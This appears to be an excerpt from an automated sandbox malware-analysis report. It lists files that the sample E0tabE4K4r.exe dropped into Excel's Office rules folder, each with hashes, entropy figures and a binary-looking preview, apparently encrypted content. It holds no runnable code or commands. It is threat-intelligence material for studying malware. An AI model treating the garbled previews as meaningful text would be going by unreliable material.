                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63077v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1399
                                                                                                                                                  Entropy (8bit):7.846503194488196
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Lor/wGdo0qQY1qh6QgW+QafPoHxg19GfzQq/o9tACFtpp2bD:Lg/Ddo0TIWqfQRg/I/o9tfFnCD
                                                                                                                                                  MD5:31DE7940214094AAE156EF1DA68463C9
                                                                                                                                                  SHA1:BB0FBC56EDBBA65F55F5706E488F9924E3E31FAA
                                                                                                                                                  SHA-256:979963B9776EEC79DBD8AB1D03EE2B3B355B76252A04E434F23E68DDF8BE26EB
                                                                                                                                                  SHA-512:BA175932C8013E074609B5C7C02E741CBFE8C88A142B318A7A322F8AB2991AEC49EB5F25D75DC8E0DD4AAD965FA4D4147043F7F12AF0DD5EEF00B41C88EB62D2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....g.f........V3U...(l.i...Y.(.r..@f..)..}4...W]t..+S...\.$.0R`.Q.........BV....<.g.h.o......wzU7A...- ..r$..k.......d#..{Nr...+@....k{i....^.*e...c.[.s.#.K"H......2.+..D..j:..H..\..^%...N..._..YG.5.U.....%$..'#r...@.k&..PR.mk2...Rj5..|.y..Yv.qZ.].n..4....?&.%.4.Z.NWC.0f.j...|B@=...L..:F.y3s.7)......P_l...x.}.Q.....g...B..X...m.E....,..u...q.!f.}.$" ..U...ER.Zi...,....s.p.x....'U......=>U......Z%.T.,...p..yZ.]...q......j...k.Trr.\............>.N`....cY.0.2......I...&.o.>..|.@.V.....$...<5.DS...F]..QH.hM_Vn.+....F...\.(...>.].......-..;..Y.<G`>.b.F....8ds.4.@.@hPC.bb'....f..C8.b......V.D_a.g......:U...y)&_=*5-.Ot...y....|.#..S:........~8""e2...w7%2..kD.D.`%..U._.c..r...`....PL......wS.....6......9P...&2r....y.n.&{2.J.....y..J..4....}....SsE`.@...p....[.}.....`....P..l.kM....S....Z.!...C..0.L.*.....J%2....-9.o..R........t.A...,.4`iu.$C;.G..2.7[.~..`...w .../..1...ocs2w......n..>M$$.^......H.b..1?......$..[...E..A/\.d./c...S

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63078v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):708
                                                                                                                                                  Entropy (8bit):7.717803306682577
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:vYgSn9fDGSObVj8YFHN3l8U89U9Svy84vwlX0rW1+E/cUSl/Uu7xLPh8VI5SUdNX:u9LGSxYFHNC9JqdvwluKnShUu7xhZM2X
                                                                                                                                                  MD5:9AC96E047813C52A832873D260345002
                                                                                                                                                  SHA1:02573D4C1440C4CA9D2CBC8128CA3E6C247533BA
                                                                                                                                                  SHA-256:A249B60AC5DF45C1972100D9919DDAB0CC4DE2FECF2C6506C10D553CE27D360D
                                                                                                                                                  SHA-512:DB11C1694A43BB2DB83E6958CC498F60D161EBDDBDA2DE7561EBA967D992D730BD887698D31E45ABF430EE9B1EC068F738220967F22547BBB9925DD57F89A106
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.Q.~....\....D...R.Z.[E..e.F..$..9....vZ!rP.\.k;.,.q.... ...\.......h.....n..8..R,_[fE%.2.e.*.hlS<....(t.{Os...aA.[..bKs|.<........<..g.~Y.b.d..&G.v9....T:..k.PkC..eI..c(..T..p<"...0.W.......JC.....p-...F..3]x.............?.......7*%..b...k....{......*.&.....}.x..O.wJ4....Q[.O.!.V2.....Ds....bK.+.D.:q...Kz..E.....g....g.4...u.,.r....>..H.o.8.%..yCq...9&2F...aP.#.......f...a.....I...3..].\..C..X....F..$.....I<"k_[n..u9I..b<..[..;...h.E.3l.O6:...C.....sD ..u.k..~.,..-.-..7.y.%.M.Y.4S.%y...`.QZ..H.)`..Pd.....@.e.Y.......r...>y:.!v}..>...Nk.|t'!?<'o.0.,........9z3.hU.b...Y........J..'.@.,.....hD.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65136v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1132
                                                                                                                                                  Entropy (8bit):7.83542466233161
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:VfF+PWhCGRuDDr07K2aN0+aadnXn868ACfqklfwFFseM2bD:DLbkD/tNndnXnCfqklfUD
                                                                                                                                                  MD5:7AC1479508E10818A90CC57E161BEE95
                                                                                                                                                  SHA1:6FE944288E57D02A71DEDC4DD7C13E0C6A1FD93F
                                                                                                                                                  SHA-256:95BA8E67EDD44DCF82842761D20C9C696DCC93EEEA6A5684348FA42DFB6BF428
                                                                                                                                                  SHA-512:906F843FD0584FF07D4F9CB93ED610054C7CA6761160BEAE9364C6031C0C0E878B34A6AF10A97B6ADA33E51AE6789C365C18CA82C77B77835FA9D8EF281C365F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..&...\..Y].$0......l....z.C7)....s.N...R....=.p.[yK..r..I..,..Ctr..1.6.\Q....=G..f........;.x..A.*..n;V[.....d$.2.;;....Z...26.f....:.).H.=..#./.f...st........7L...7.F...t.Z8...S3D...j.\..cI.F...0\...K._<S...=\...0..Z8,..)...5...>.>.C..T..A.........n:\.D....b...$fJaM.N.9).d...}P....z1#.....IPN.R...].@(.x..A(....... .S....W..}..D..../n\(._..O.....:.u.;8N.....5...S..y.g!%.y.Hjo)..'zo....u>..p..O......F....R&..u....d.!n...*......?h.xM./.......v.r...6}..B.[+F5....Vz.... .g"}B..d.Zx.....j.;..v:$P...:.`.I.......k..c~...:.B>...8..o.....b...=$.Pt.[.1..X.<....A..q.....}.K...?.._..$KHY.0...@&o.yi.I.s..QT..O..DY..A..L.{.$i.*../X...m.4I.n.Q...^.8...k:Pw....T?F..h.....bdv...%...*Tb...WPvs`h..UO...p.f..g.h._.jS.....m0..PQ2.........o.M.l1U..&&.Z..GJ.l...U...&...b..|.m:.B................lQ.C......|..$.`.8}@......,...9.v..K..._n$.....V1a6G...b....z...[,.9..x.^..(B$~m1..~...... .g...U.~gn....%q....l7.P...*E|.X..g...6..2..0.x..I.....k^..#r...N*...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65137v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.721821135786556
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:AlT6dQpxv2Zl4jXiVCsYBylmO7DlnMyR8moQ/S6FNXGZksoiYvsYvoooWSUdNciD:fa7iVfY0mylnMRnQ/S6FZGZkDi0eV2bD
                                                                                                                                                  MD5:46F25B7A08AE6A30A957D8A7EADCF9BB
                                                                                                                                                  SHA1:4E614F4967434159493BD943EF72D267F696BC16
                                                                                                                                                  SHA-256:CC06644ACDF1B0C9C7485DA323C16E9A2146CC63EB2621040EC55EA25D3CE2C3
                                                                                                                                                  SHA-512:6723D817A88368F28271DC99592B0C9A84331FC47C398C01FCAB5EBB0B82CE557DBC60ABADFB70FAD693718CEF8AB4FB6642B10DF4E461A3AC1DC38BC3BB038F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.. ..C.....R...#V.?.!..\....r....F.a....q...x.d.j@.M..W.e.:...[H..\.U.L#..#...'....Q...k.5.N..]..)..1.....w........wfeH..3D.H.s.....x.y..WrM..y2...5?.p....;....u!r..Y~.C7z.k.\..v....?j...........k?..saM...v.d.v.q.Y..i...L.za[?.MR.}.c...$....yu...!....C....6........h...p...wz.....H..n..G.f...T..E...=3.X....YKm.!:..I.h..*...O......./gW.mkS.8c....gwd....!|].~.E6G~..m.XYkg...lx..w......0...?I.0W..I...[.....!..B+...y.v..^..U....z..|N...N...*b.j...,.B^'....9o(P.h..Iq......Q.....%......'>...H)A.....=.CWx.D..v..z...<..G.8......*.SD.&.1..>.. k...L..p.aq.".%4&.6...q*.$....u........._j..6...F.mp..j.....p.8`....Z..w.".b.P.._...xk.^.../.z...Z....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65138v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1094
                                                                                                                                                  Entropy (8bit):7.81909314376748
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:bdmy60YmG1NHfvz8mRSNrPVKMndB2FQB7Vymk6M5HMjls/pIF2bD:EyXYmW5LTSSYyQJk5smBHD
                                                                                                                                                  MD5:E9B34B848C3622780681216E02C19D5A
                                                                                                                                                  SHA1:DEC77355A75D820CECFB557D5D2CD462EACA3876
                                                                                                                                                  SHA-256:35AC5D2195EA0353BD8D442DF6F458CE1E778A9C536E1893BF7BDA3CFC2B7BD5
                                                                                                                                                  SHA-512:53564833698B4CC696F4BD29B248F0FBAA6E9B26088414CBA2FD40B8B832C4C3C54BFBD71CF0DEBD8AC455258968ED2F725EEBF94766BA722BD2CEAB4B011BFB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..+.D.5"`...j3...1..g...y..k.B.1N'.TCi.B@..y.....).T.......-.T..{..]$Ef..G2.At...c.`.b...C.....vj8r...K...C..Y..J?..i.].Pr....5....M...P.c.Q....L..a..Nv...I..,.f..^L+{..+g.kM..PG. ..a).._.u. K)O.-.....g..J_$....o..t........oiU.*.Q...)..::..P;CGv*=......'5/..-.z..I.....<.....;/..V.j.!:...kck..H...h..fqg...<.dy..;.....h.1*/....N..cN..7...J.E.e.t..3.v+a7s..*R,K.6.2..B..}..T..!..5P@.n..Ui....8G..c...t.e.I$o.Yh...55..........;?...bk.`.f..L.....@...XZ.....2..W..xO..7..N....:.......c.dvo...QK.4+.6'......f.5.t9$.q...........h..tO...P...Qz}.g.BQM..M8.Y..w....8]!..K...p...4`"..i$.......6.........@.`6..u...=h4 ...h....t&....E%..k._'.S.&...)J4..$.B+*.x.=j.....VkH3..H..}...*=......5r.W....<........l{....<....P.V..Y..i2.%....+..E_..~.^...pF.I..D......a.v..M,.......5F.../%..C.^._.....t.65h.10.O.x.U...0IH..k.-..kR..Na...b...I5y7fu......[z..y.xWh-...e....g7...J.......T_..V..Jt+..Q...8..S.5........V.3.....B@...iR.w....F.....~.w..b.q..ZN.h~?@.M~:.7.b

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65139v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8095
                                                                                                                                                  Entropy (8bit):7.97426538968932
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:WlbpVLm92O6VuczNWMn8OHO9P2hXrfw2+wtn5v6AomJdRt2VDUfzCkQKHLJF7nO:WDVAHc48/X02+25SAomLcUukdJFC
                                                                                                                                                  MD5:7CD6250A6FB254C0DC19DD05F596CDE9
                                                                                                                                                  SHA1:D56A1A921205654B8774ED3533E2125BB3F9EBD8
                                                                                                                                                  SHA-256:BD54A168314F46AAC08AFE43C942700E994331A2AD7E4D10C9566BEC6F58966D
                                                                                                                                                  SHA-512:A54BD37A83FE4199EE2F8A1A0F25A168AE785D3A73BD6C4442A8FD4C35329045A4BA1197D8928E3B42D775D751301853B184CE36DC7C5E716EE90DCB411764CC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....tQ....XSW..%.aG.............X.......2.......w.jQ.L.7 .(..mg.}.....h.0.@.Mz...FtY.....[ha.45.a%..^.Eb..!.~n.Rn.~p.*..eF..R....(zy............^....7(8`....p.F.*..<)..z....wid..=GOU....+.eM.Q.D..7....A.......x.x{o>!B.K.Qn.......:Z8..`}0.\.sb.....2..09.;..?. ..V....0V.......xQM)Q..tR.B....Y[.6..y.e.J......2..'M.U[ #n.w..OU..T....%_....=....*T....e...h....9.nC..L[.H..',...:Dx.P...g tx&.I..8..m..]..._...........;....9!...WQ.T.;$.A...-...x.y.......d...d..r0..X.h..A....b..y/..:.qb=.<....QO).Wh..b.().o.{...P...m...2...u...!}..vi....RB......Jn...........Q.BD/.."kx.....3..\.0..I`O<.p^pyI...~....|I...1h.........f<y..e...\k..;...P.*.(..\S..x..<=.......+...nQ....|..K......,.)n..N.......XNO..N...>*Wf./.F.5...TB3;...Pn.h.{....1x#.k....5{..,.#~.PJ:...]......*...gm&.P3....1N0.LQ....H..N'>.....\..dc.M......0.{..W$.n2..\-.!C.W...N..C.r.f~E-._..v..V...=.....w.z-PB.o......0h..N..m.&..q.PB.Zs..Y.6~]2.n4......o?&.......#......`..~..*....{..F&QXG....R..u.c'=%..9B@

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68000v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1047
                                                                                                                                                  Entropy (8bit):7.7874519570410285
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:g477zlibEcVB7etJUOLpmGBgRtgBwytDnbsvnnyhV2bD:g477JibEIYtJUO1mVSwBnyhuD
                                                                                                                                                  MD5:C8111E82DECA969C645D45341E39D15D
                                                                                                                                                  SHA1:72CDC912DD6956987FFA1C4BA3746F9AD0EECB7E
                                                                                                                                                  SHA-256:798C9571747B714870C7C4D5C55F71CDCCAE5E332C208ABDA3F2B7B5A09115AC
                                                                                                                                                  SHA-512:6E7C26C6363719AE3865B90680178AE6E9B1CF3E77616CB776DA5CA5A042A6BB0CDB015A181F201977B1F8E2FC75E11CE31D4885D934E1ABB8C18D879201A3A8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml]."..2]...3..d.~.V6.0.H...._....j+.....LY.9...W-n...o.....(.j...s...Id.\l.v .%K......;.J*.n.WY.^..||.[....../....p.I..'.BZ..q.J....;...q.....(&xUg-..........8qDZ..10...$.J....a3>....&.^.....).9I1k8.../.7.....p..[....u.Ww.?.....{..nH6...&#!.EY.B...q.]H...&+.-..f3....._.......E..".I{.P.....x.{.oyA.....d.H..n.x.-%.!.?...>+...;.h.Y....>J.......!....9..X...xQ.....w.{O..-..K..N.>.........I.j?..n.S..;..C..=..E..=....2..5<....R....n3<.;..5&.L.$2.....n.t.....aE..6`LsD.o.ITO...........3.mn.d.`x......^X.2.(i|...`.H.F.q.7.M{'U.-...w...N...$..j&.P.........~.qO.Ul..3.9.<E...q9...W.`.QE..z........N..1.........$.. .).au.........@.n.Z..dG.F.....AB..8.kW..)....l~.6m..;6ip.;..7.]....l:.$7..Bo......d.g.O.....j"l.....S....9...a.. ..q.*..j..8......>EQ...Df .....s....H......{..L..:v..U#o....../[N\.NF...}...97of...V...0N...".....T....~Z3.8`.B...u.....y...i...$...X.<[.._g...b-.......t.W..'.A.(.4.....)vE......A..mMsRxMUuXypapZbGOAfxD9pczHmW8zV

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68001v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1003
                                                                                                                                                  Entropy (8bit):7.794687805288098
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:t/naj+wFzqQSqY03FLcVbu737PMs3e7gR5s2bD:1naKwwINcUz7PM4/D
                                                                                                                                                  MD5:7FCB04C732B859A194E65B9DFE5AA8B8
                                                                                                                                                  SHA1:0B834EFFB66781BC47144E9B7B2DFD39D6C3609C
                                                                                                                                                  SHA-256:E195CE421D48FDDCA65C444626075926EFC738B77A7F200326625A28B0E52D55
                                                                                                                                                  SHA-512:80A8822C317B27A0BC79ABEF6244C04EDACE8AB9977F27231A9AD2E3E6DCC41059D25ED8F32633A5A7D1A7C7726D064D2EB271856C662EFCFE4DA05E4DD1A2AF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......q.j..it_..$:m..L.....*.}.0.^.3^.....r.d.....i..7%k...t[.......o......4.../......3.p.^.x7_.......k...%..9>2....$..t.}....G.X.....k...u.U..A..h...w4!...... c'...\......I .h...d...h."......w...0.I.F.F...N...9..a.keUvP..aa.l.hn..v...&..c..P...XQU..:...`./4....T.Pe...._..t...LH...s./..9).m.n..."....[.8..;...2[.w..Q..Z.E].gk...i.. .p....d...63b.r.g..W.[.U...O....=..b]...c.X4?..,...........7M~..i..,.@KU.oDS...M.?...(1B......vx..|zklFi...\.#Y.xc.tp-.F..`..7......R.g.7..N@D.%.......YeQ.....O.c.#./.g(.zG.yM@.W@.kw..2..C...d.(Tz..7.d...e..S.!.3..M......L..5...uT\ ...%....|.5..S.D...A...C....ODhZ...../Uk..i...^]/'.t2.m.+{......}..N.:.x...3.4..,.%....4.,Z...... (..o.t"...,x...t.S...|.S.........&.ID..o............G38..vT5+.O...*.....m...DY.D.i....J ....f........v-...)...-H.4........u;..ncK..[..........{-.....2....g-.H0.G.5.{..\EVE.`.\K....0^..$A....'...;d.-..,J.fW..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68002v11.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2980
                                                                                                                                                  Entropy (8bit):7.9380016527251245
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:aKkzmGDLtMDrkxvjPhy0Mm4TEqOBKr+sNYqToDM++VQwPOf6Rf4nRNwarD:KzntMDYxvjPBwbOsrYrDM+xsV54nRv
                                                                                                                                                  MD5:A78B7A6F6A73275876FFB2E5A47D4228
                                                                                                                                                  SHA1:2B69B392E8D079F9BDB9BECFE89D411FEFEE3464
                                                                                                                                                  SHA-256:526191368BA5CE22645F0484AA7DE667D8FE6F20CCD6095A4E7FEA975DCBBAE4
                                                                                                                                                  SHA-512:F36A396B101BAA5C5BC99182F26B061EAFBEAC7B8E6AF931B5621AA8F05F65F50408149205017BB58F7530DE0EC3D74A6C094CF653985B530608421EA04627B6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....-A........5(..;."..R.~....f..a"....C..0...YK..^...d.......4.i..@..K.F..n!...vOz.....*_Nc..Z.G..H..5d.T...'.@.{.S.a.BW.:.....j..n.w..M....$5...M;...&c98.Qv '..c.8.h...~.a;9....L_c^..o......6n..O...^.....2(.z...T...4...t.?+.LS..?..BBi2...;.-.h....H.uG.N&.....q.9..eq.D..;k|P...`m3..g...p.7_...}=.w..fd..Y.... ......s.v..-......j....b...N.w...W2Dq..<..}..9p..i...|fE..o4.;.F.~.,........M5)....-V..V....L~....IU..p....$..U.Ntr...&.?.?Z?b`...-6.v.V....(.:.........l.......}T...=>q..r...T..{.....z"'..r..|@.+*.......i......11.S..w....d......`.h.z.....&s8.'gZt^..ti'....Q.... #...3..[|L./..Y#..f.>K=E.g..l~.9.8..@e.A.}X.]n.3m.b..J\..%..x....2.zU.Q......7].`^...q.v.\#.a.0.......]...........3....^.l...S.{oZ...p....6..=FL.u.9.oN..r.d....cs...FJ=.\y.e.IP..E.......{V..V....:....yX.3..x...Q.g.=..c.e.v6!..v3...c.|.1.9..V...__[...../`J..5.8...%E.V..KV.X.9A........B....,..O!l......Q.3.....bK...?D.ok.5/....A.\.V.D.......W.2PW.I`..@.......-.s.....[,..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68003v12.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2672
                                                                                                                                                  Entropy (8bit):7.920228741899383
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:a84yYXwwHnkGcmjzj2ZV/DFqn41U/5k7nHe4OAqBtiqwoVcJLfCD:F4HAwpjH2ZNUvSLH7OAqtioVp
                                                                                                                                                  MD5:7772D3A4E690D72F13DAADD31317C72C
                                                                                                                                                  SHA1:5FC35DB75707E646E8442ECD04E09FC6997C5207
                                                                                                                                                  SHA-256:CDA8A60058D6DC213D3CCB63BA15B0F764A11089787434B285172149924A7DE6
                                                                                                                                                  SHA-512:934346ADCD746AFC0202EA7340DD35DC79904CD30488FA39D2B1C1FDAC2B31A68BAC13EAE478CECE381374F6145E00F29E3D1396B9796164D2BA16DB3696FEE5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.*..S..F.....f.*n....7.D.b......@V)....:.........\\m....i.....hQ."....qu...L..t`5r....^F.6.Fh..r..e....|>......v.8Ya..s3.q>c.........\....Q..m&D.0XA,.E.b.O..#.].n,.n.tE......~......B....P|j.a.......8. 3G....A..t.<....D.n1...-.0.....=v..8._:...,.,.9............D....zt..7.WN8.,.<.i.#.<.]....7C.j.^..u...c..H`|...\.S.I..Z.....g.@....@..>.....>........pn.1G.)7D...].&)s..q5..|..`.`...5..[.8.T..MO.w...f..~.....a....}}..g....j"~0f.7!.)R......lUk...%...T..C5.".9.-.F....gm.V..t........9.J..[.~.4NV.$..6.#......bD....\.).......Qbg.........gg......ST7.#ad.~t...i.....j9......5<..*9....55.Tt......8Nl.8.s....1n..d..Y....Kn.~..b|.......n$.F.?.=.......q...Zm../.....u....*.....7.fL1.....%....|....D.....`.z.Ja..f..2.=)...ME...VO.XY.Z..F..{.4:.........n[\....c5.:..b.r...p.j......|./..w9...............up'.J......^....#..7.:@...<ar6W..8..........bde.?|.A.3...S<..b...o.....lr. <..*.8...z..i$../..Nv&..;.9..$AfV..f..`..b..EV-.lf.?.SW...".....Ra5..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68004v16.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2762
                                                                                                                                                  Entropy (8bit):7.931750856456336
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:KV6cdeBoT0PgzUdJYdKd6xOJBYX1Ebgb35eCC8SAp+h/GB4jceXUscdkD:06cd2oAYzUdlrJBYXTb+Apes4IeXUsd
                                                                                                                                                  MD5:B610E7EB3AD193A28A654EA5348AF240
                                                                                                                                                  SHA1:B53FE131B87B0F5DA8E046E79F029EFE623658EC
                                                                                                                                                  SHA-256:7BB89C2846C0F5BEC7AB4A87D7EF0E6204F5A976E0D6AE233CBA7F513E21E860
                                                                                                                                                  SHA-512:B0AF3F480A2CBA3DC129CC4AE6F22E93CCD775E71C14D0B8EEBEDCBDF15654014D185A9B43F9D19F83CC4EACE494ABC1CCD4FD5BDB511003599E3C4E01335869
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..5#....yK00.4pb.z..I.....u.mZ5.(..._.W..K..z.efET>.a.B`.G.2.O..if.T...I...m.;wO %.d...@&.q..o6...5...^.=<w.JG..v.}x.\.Q...._.R ....U,.7...2.z..x.._k#....x....v"^...c.....TIe.K.......ND.9.....^\.o.v....*1....2...vD(I..;......C[9m..t@......EW.\l5.....K..v.x....).#..IN....|...9....U.'..y..u..-...%38bds..oD.'.-[q...R....z.>F.n.Zk.~.4EQ-k....p.........{..8'a.......w.7X...3.\....j....Y.9f.........@Q.^k..T....7.'..#._..7%..fq..>*W.z........B...c{...mq...*..,.........{a.4..%=...%8m&m..:..$.a.TQB...c..(.dQ..........dU.y@#$.r..{...........b............U..5.....&e."].>b....nx>......%.;zn+.4o2....r>..M.._`....nfl,.9\r...*..tk...bC.]....N.7f*L..#....I..n9X.R...n0h...W.7!v.q.u.\....q-..@l.8...Ll.....(...p.q.'%nf...t..u8..m.........MP`(.a...0z...).|..>....&-.i.N..........\.X....A..NO:..b....`E+.L]X..F..=......)m.`.3..$....E.,..b.d...........>..:...\.]......G.=6....xdB.p$.....%..!..|Nw.....w1.g.8.$....w..a..D.LR...._....~...]._r.....V.ej.H

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68006v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):838
                                                                                                                                                  Entropy (8bit):7.75730283554027
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:b8fsPqTAhuFluF7j8iH3vO/vyq4wfOI2bD:Avkhuro7jRUKP/D
                                                                                                                                                  MD5:ABD87F762D6D658ABA937518F96503E9
                                                                                                                                                  SHA1:7793C2CDD6417D3F48CC8814B34FDF0FF4CDAB28
                                                                                                                                                  SHA-256:A4B1FB249B13E7141852D2032992A994DA39EB3C5A4F971F51C1DEDA40FF6636
                                                                                                                                                  SHA-512:96D7CCC691DD3D1CFE2C73306539B61445FD8BD3EF3895F3B2C4051B18D919DD92C7F858E703CF53D190FC0209112B66735260EEC3F4B7C2E0D83319B251CB7D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..8w.....i...U.0..)..v...i.$a...sc..*..y.....C..{..!m.Q..c.O\.V,.j^..'...$<+...:*~.....7..."X.p2h&..Rx.WV....?..1S.j.i./."..m6...e.zL....(.u...J.GXH0Gm.....u..M..A.m...c.U..$.uAg.D\.;.....v.H.....i...Gq.,.yk.+...;..<._.'..zw...U.v..H@..T.....f,...C.....]....._.E.....*....P..:W....`o:..B..d.1...Jf..-.?..]..u.4t....}N{.;.e..j......oN....\z[..,.....n/".O,..<X..3c...u.?.l...%.Sm.o...'.."!....s+...~.....P>...q../ ....Q........A%n"...R.R.=.2........Nx}.(..O..v=..s.v..F.p....sY].%.)......M.....^...X.HT({>D..-.C).Bc.._....q.).<k..G..M.]m.-.........p.Z..Wh.....-urO..tO.@C.......]9.Y.7;..-...Y.Tet\..>.....D.ji..s3.*.A...Y..+.2[=v....q.r.4...W:N.[a...+.,.a..L.Ijy....W...M.n.J/..../|...t>I.Nd.....T..b@\.o..y%..j.33.(C...qmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68008v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1010
                                                                                                                                                  Entropy (8bit):7.757560470510928
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ldKxSKs3DmA1oSoWaEoYaEW7q9TKBijPPqoCjvp3naV2bD:FXDj1oSBaEoYaEY5ijhCjhKuD
                                                                                                                                                  MD5:56FC8BEBF06A54B2E676A34B0DCC2E09
                                                                                                                                                  SHA1:8012965707C85FC84988778EDA20DE0071061259
                                                                                                                                                  SHA-256:79809946EC785DE3539E6BAA185114EA0493384C67E7DCEC7663DB218C472C38
                                                                                                                                                  SHA-512:FA3E177054FB45B6BD8EF8EE766B5B46EBBDA509A1F17A1221B31B916A67A2C84070779A126834E3DF1F118E0E6C915D22F87AECEB699AC52095AA0168189F55
                                                                                                                                                  Malicious:false
